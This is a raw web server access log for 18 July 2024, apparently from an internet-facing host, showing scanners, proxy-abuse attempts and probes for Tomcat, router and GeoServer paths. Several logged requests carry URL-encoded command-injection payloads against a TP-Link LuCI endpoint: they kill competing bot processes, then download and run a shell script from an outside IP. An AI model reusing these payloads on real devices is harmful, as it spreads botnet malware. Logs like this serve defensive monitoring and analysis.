212.16.159.247 - - [18/Jul/2024:00:11:31 +0200] "GET / HTTP/1.0" 200 1895 167.94.145.98 - - [18/Jul/2024:00:34:47 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.98 - - [18/Jul/2024:00:34:50 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.98 - - [18/Jul/2024:00:34:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 198.235.24.80 - - [18/Jul/2024:00:43:27 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [18/Jul/2024:00:57:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [18/Jul/2024:01:09:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.246 - - [18/Jul/2024:01:18:55 +0200] "GET / HTTP/1.0" 200 1895 149.50.103.48 - - [18/Jul/2024:02:47:05 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [18/Jul/2024:03:25:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:03:49:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 94.156.10.163 - - [18/Jul/2024:03:50:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 94.156.8.70 - - [18/Jul/2024:03:51:13 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 45.148.10.202 - - [18/Jul/2024:03:57:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [18/Jul/2024:03:57:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 206.168.32.107 - - [18/Jul/2024:04:09:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [18/Jul/2024:04:09:54 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [18/Jul/2024:04:09:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 78.108.177.51 - - [18/Jul/2024:04:21:40 +0200] "GET / HTTP/1.0" 200 1895 149.50.103.48 - - [18/Jul/2024:04:24:01 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [18/Jul/2024:04:46:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 184.105.247.252 - - [18/Jul/2024:04:49:57 +0200] "GET / HTTP/1.1" 200 1895 184.105.247.252 - - [18/Jul/2024:04:50:34 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.247.238 - - [18/Jul/2024:04:51:05 +0200] "GET /?format=json HTTP/1.1" 200 1895 184.105.247.238 - - [18/Jul/2024:04:51:30 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 45.128.232.152 - - [18/Jul/2024:04:57:53 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [18/Jul/2024:04:57:53 +0200] "-" 400 1930 45.128.232.152 - - [18/Jul/2024:04:57:53 +0200] "-" 400 1930 45.128.232.152 - - [18/Jul/2024:04:57:53 +0200] "-" 400 1930 86.139.190.3 - - [18/Jul/2024:05:19:53 +0200] "GET / HTTP/1.0" 200 1895 44.220.188.129 - - [18/Jul/2024:06:27:42 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [18/Jul/2024:07:06:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 23.95.200.178 - - [18/Jul/2024:07:42:46 +0200] "GET / HTTP/1.1" 200 1895 45.89.245.57 - - [18/Jul/2024:07:46:23 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.57 - - [18/Jul/2024:07:52:59 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.57 - - [18/Jul/2024:07:53:03 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.57 - - [18/Jul/2024:07:53:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 84.54.51.37 - - [18/Jul/2024:08:24:27 +0200] "GET null HTTP/1.1" 400 1994 184.105.247.251 - - [18/Jul/2024:08:42:42 +0200] "-" 400 1930 141.98.11.15 - - [18/Jul/2024:08:55:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [18/Jul/2024:09:03:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.43.33.218 - - [18/Jul/2024:09:07:30 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [18/Jul/2024:09:16:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [18/Jul/2024:09:23:35 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [18/Jul/2024:09:23:39 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [18/Jul/2024:09:23:39 +0200] "GET /favicon.ico HTTP/1.1" 404 729 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:09:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 172.202.177.44 - - [18/Jul/2024:09:45:23 +0200] "GET / HTTP/1.1" 200 1895 213.32.39.39 - - [18/Jul/2024:09:45:47 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 205.210.31.101 - - [18/Jul/2024:10:14:25 +0200] "-" 400 1930 205.210.31.101 - - [18/Jul/2024:10:14:25 +0200] "-" 400 1930 45.148.10.202 - - [18/Jul/2024:10:15:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [18/Jul/2024:10:15:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 80.76.49.133 - - [18/Jul/2024:10:23:07 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 46.245.8.207 - - [18/Jul/2024:10:40:33 +0200] "GET / HTTP/1.1" 200 1895 170.64.165.173 - - [18/Jul/2024:11:01:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 189.71.131.197 - - [18/Jul/2024:11:21:59 +0200] "GET / HTTP/1.1" 200 1895 5.196.102.74 - - [18/Jul/2024:11:29:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [18/Jul/2024:12:25:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 68.69.186.202 - - [18/Jul/2024:12:27:26 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [18/Jul/2024:12:34:08 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 103.56.61.144 - - [18/Jul/2024:13:10:02 +0200] "-" 400 1930 103.56.61.144 - - [18/Jul/2024:13:10:02 +0200] "GET / HTTP/1.1" 200 1895 103.56.61.144 - - [18/Jul/2024:13:10:03 +0200] "-" 400 1930 103.56.61.144 - - [18/Jul/2024:13:10:04 +0200] "-" 400 1930 103.56.61.144 - - [18/Jul/2024:13:10:04 +0200] "-" 400 1930 103.56.61.144 - - [18/Jul/2024:13:10:05 +0200] "-" 400 1930 103.56.61.144 - - [18/Jul/2024:13:10:05 +0200] "-" 400 1930 103.56.61.144 - - [18/Jul/2024:13:10:06 +0200] "-" 400 1930 44.220.185.134 - - [18/Jul/2024:13:27:03 +0200] "GET / HTTP/1.1" 200 1895 189.147.101.24 - - [18/Jul/2024:14:22:37 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 87.121.69.27 - - [18/Jul/2024:14:24:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [18/Jul/2024:14:39:54 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 91.238.181.23 - - [18/Jul/2024:14:48:23 +0200] "-" 400 1930 206.168.32.102 - - [18/Jul/2024:15:08:16 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [18/Jul/2024:15:08:19 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [18/Jul/2024:15:08:19 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [18/Jul/2024:15:28:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.71.226 - - [18/Jul/2024:15:33:04 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:15:49:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 194.59.31.99 - - [18/Jul/2024:15:54:45 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 94.156.10.163 - - [18/Jul/2024:16:28:22 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 35.202.9.133 - - [18/Jul/2024:16:46:47 +0200] "GET / HTTP/1.1" 200 1895 114.32.214.94 - - [18/Jul/2024:17:01:56 +0200] "GET / HTTP/1.0" 200 1895 114.32.214.94 - - [18/Jul/2024:17:01:59 +0200] "GET / HTTP/1.0" 200 1895 114.32.214.94 - - [18/Jul/2024:17:02:02 +0200] "GET / HTTP/1.0" 200 1895 114.32.214.94 - - [18/Jul/2024:17:02:10 +0200] "GET / HTTP/1.0" 200 1895 141.98.11.15 - - [18/Jul/2024:17:14:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.202 - - [18/Jul/2024:17:14:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [18/Jul/2024:17:14:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 165.154.36.177 - - [18/Jul/2024:17:26:33 +0200] "-" 400 1930 165.154.36.177 - - [18/Jul/2024:17:26:44 +0200] "GET / HTTP/1.1" 200 1895 165.154.36.177 - - [18/Jul/2024:17:27:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.36.177 - - [18/Jul/2024:17:27:02 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.36.177 - - [18/Jul/2024:17:27:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 165.154.36.177 - - [18/Jul/2024:17:27:03 +0200] "GET /config.json HTTP/1.1" 404 729 80.76.49.130 - - [18/Jul/2024:17:37:46 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 40.118.210.70 - - [18/Jul/2024:17:48:38 +0200] "GET /hudson HTTP/1.1" 404 724 78.108.177.51 - - [18/Jul/2024:17:54:18 +0200] "GET / HTTP/1.0" 200 1895 194.59.31.99 - - [18/Jul/2024:17:59:39 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 45.128.232.59 - - [18/Jul/2024:18:11:57 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.59 - - [18/Jul/2024:18:11:57 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.59 - - [18/Jul/2024:18:11:58 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.59 - - [18/Jul/2024:18:11:58 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 47.251.93.227 - - [18/Jul/2024:18:59:50 +0200] "GET / HTTP/1.1" 200 1895 47.251.32.124 - - [18/Jul/2024:19:16:14 +0200] "GET / HTTP/1.1" 200 1895 104.168.70.165 - - [18/Jul/2024:20:37:23 +0200] "GET / HTTP/1.1" 200 1895 84.54.51.164 - - [18/Jul/2024:20:55:53 +0200] "POST /login HTTP/1.1" 404 723 87.121.69.27 - - [18/Jul/2024:20:57:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.79.181.179 - - [18/Jul/2024:21:32:39 +0200] "-" 400 1930 65.49.20.125 - - [18/Jul/2024:21:37:31 +0200] "GET / HTTP/1.1" 200 1895 65.49.20.125 - - [18/Jul/2024:21:38:20 +0200] "GET /favicon.ico HTTP/1.1" 404 729 65.49.20.89 - - [18/Jul/2024:21:38:51 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [18/Jul/2024:21:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 194.59.31.99 - - [18/Jul/2024:21:47:52 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [18/Jul/2024:21:50:00 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 64.62.197.208 - - [18/Jul/2024:21:59:36 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.210 - - [18/Jul/2024:22:00:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.206 - - [18/Jul/2024:22:00:24 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 64.62.197.198 - - [18/Jul/2024:22:00:37 +0200] "GET /gremlin HTTP/1.1" 404 725 84.54.51.37 - - [18/Jul/2024:22:17:26 +0200] "GET null HTTP/1.1" 400 1994 172.105.128.11 - - [18/Jul/2024:22:35:36 +0200] "GET / HTTP/1.1" 200 1895 80.66.83.211 - - [18/Jul/2024:22:42:41 +0200] "-" 400 1930 198.235.24.125 - - [18/Jul/2024:22:49:51 +0200] "GET / HTTP/1.1" 200 1895 218.75.38.210 - - [18/Jul/2024:22:55:11 +0200] "GET / HTTP/1.0" 200 1895 45.82.122.216 - - [18/Jul/2024:22:57:31 +0200] "GET / HTTP/1.1" 200 1895 45.82.122.216 - - [18/Jul/2024:22:57:31 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.82.122.216 - - [18/Jul/2024:22:57:31 +0200] "GET / HTTP/1.1" 200 1895 45.82.122.216 - - [18/Jul/2024:22:57:31 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 115.238.44.234 - - [18/Jul/2024:23:00:18 +0200] "GET / HTTP/1.0" 200 1895 118.193.56.246 - - [18/Jul/2024:23:16:22 +0200] "GET / HTTP/1.1" 200 1895 118.193.56.246 - - [18/Jul/2024:23:16:23 +0200] "-" 400 1930 185.191.126.213 - - [18/Jul/2024:23:29:59 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.202 - - [18/Jul/2024:23:30:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [18/Jul/2024:23:30:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 172.105.191.66 - - [18/Jul/2024:23:32:22 +0200] "-" 400 1930 172.105.191.66 - - [18/Jul/2024:23:32:23 +0200] "-" 400 1930 172.105.191.66 - - [18/Jul/2024:23:32:23 +0200] "GET / HTTP/1.1" 200 1895 172.105.191.66 - - [18/Jul/2024:23:32:24 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 87.121.69.27 - - [18/Jul/2024:23:42:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 52.157.1.168 - - [18/Jul/2024:23:49:33 +0200] "-" 400 1930